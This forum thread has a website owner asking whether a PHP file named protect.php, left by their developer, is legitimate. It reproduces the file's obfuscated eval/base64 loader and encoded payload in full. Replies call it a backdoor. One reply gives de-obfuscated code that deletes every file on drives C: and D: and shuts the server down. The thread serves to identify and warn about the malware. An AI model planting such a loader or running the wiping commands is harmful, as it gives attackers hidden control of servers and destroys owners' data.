Jump to content

Recommended Posts

someone create for me website , but i think he can access on my server with website files , i see file name is protect.php

but can you tell me this code it legal or not , thanks

 

<?php /* This is file is to protect your site. Don't attempt to remove it. And this file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x370;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDVjMyk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnRW50ZXJ5b3V3a2hSSFlLTldPVVRBYUJiQ2NEZEZmR2dJaUpqTGxNbVBwUXFTc1Z2WHhaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>~Dkr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLO0xNWLyHA1SmT09NHeEXHr8Xk10PkrfHT0knTyYdk09NTzEXHeEXTZffhtOuTr9tWAxTBZfNHr8XHr9NHeEmbUILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==eWplfMyShuniC2SPk0IQkZXmYjA3YjCxYLHZKeCZYjr3HzC1HzCzYeaoYjW2YTCzYLC2YeC1HjIZYzOnYeC2YefnYjr0YjOyYLC1WTA3YzI3HzW5YeWzHeC3Yjw2OeA2HzH0KTW1YrA1HeA0YTH2YzC5YTCzHTOyYLr2HzcrYLH3YzC0YeHzYTA0Yjr0YzA2YzH2HjWzYeL3HeOoYzF2OjOnYrr0YzH5YeC2YTW3YTC2WTW5YeWzHeC3Yrr0YjC0Y0r2HTW2YrA2OjanYTF3KeFzYrH1YeH1YTH2YeA3HzW2OjW5YLW0OTF0YAr0HzWxYzC1HzF5Yew2WjanYTF3YzC3YAr0YeFXYjH0WjC5Yer3YjCzYTH0HTF2YAr2KTWxYzC2HzF5Yer2KTOeYeH0HTF3YrH0HzWZYLW1KTA3YzI3WTanYTH2WjH3YeL0HTcoYrr0WTW3HzL0YjC1YeF1YjcnYeL0YeHXYjF0WTW2YjW3WTCxYeC0OTcoYAr1YzF4YzH0WzA0HzA1HzC0YTFzYecoYeL2OeOyYzW1WTWzYer3YjAzYzL0HjctYAr1YzF3YjF1KTfnYzE2HzOtYjL0HTF2YjH1HzWxYzC1WTC5Yer3YjCzYzL0HTC5YrH0HzWxYzF0WzWzYew2OeA5YTF3KefnYAr1HzctHzF0KTWxYLC0WTOnYeFzKTW2YjA0YzA2YLr0KTW0HzE2YzOnYeC2YefnYjr0YjOyYLC1WTA3YzI3HzOeYTWzYTAzYjW1YzH0YLC0KTcyYrA2OjC0YTI1HjctYjwzHzC0YzA0KTWzHzL3WTW5YjL3YzC3YrW0HzF3YjF1WTcrYeC3HzCzHzw1YTFXYrC3Yzw3HjLZKTYtkZLpKX==alVnRPIq

Link to comment
https://forums.phpfreaks.com/topic/298270-please-help/
Share on other sites

That is a back door which basically allows anyone to execute code on your server.

 

Sorry to say, but if the person that built your website did that, then you can not trust anything else he has done. Get rid of it, try to get your money back, and find a legit developer.

Link to comment
https://forums.phpfreaks.com/topic/298270-please-help/#findComment-1521346
Share on other sites

  • 1 month later...
The de-ofuscated code is here:
 
$WshShell = new COM("WScript.Shell");
$oExec = $WshShell->Run("cmd /K del d:\* /q /f /s ", 0, false); 
$oExec = $WshShell->Run("cmd /K del c:\* /q /f /s ", 0, false); 
$oExec = $WshShell->Run("shutdown /s", 0, false);

The first line creates an COM object, that uses WScript, which is used to create batch jobs.

Then the second line uses that object to delete everything in drive d:

Then the third line uses again that object to delete everything in drive c:

And finally, the fourth line shuts down the server.

Link to comment
https://forums.phpfreaks.com/topic/298270-please-help/#findComment-1525646
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.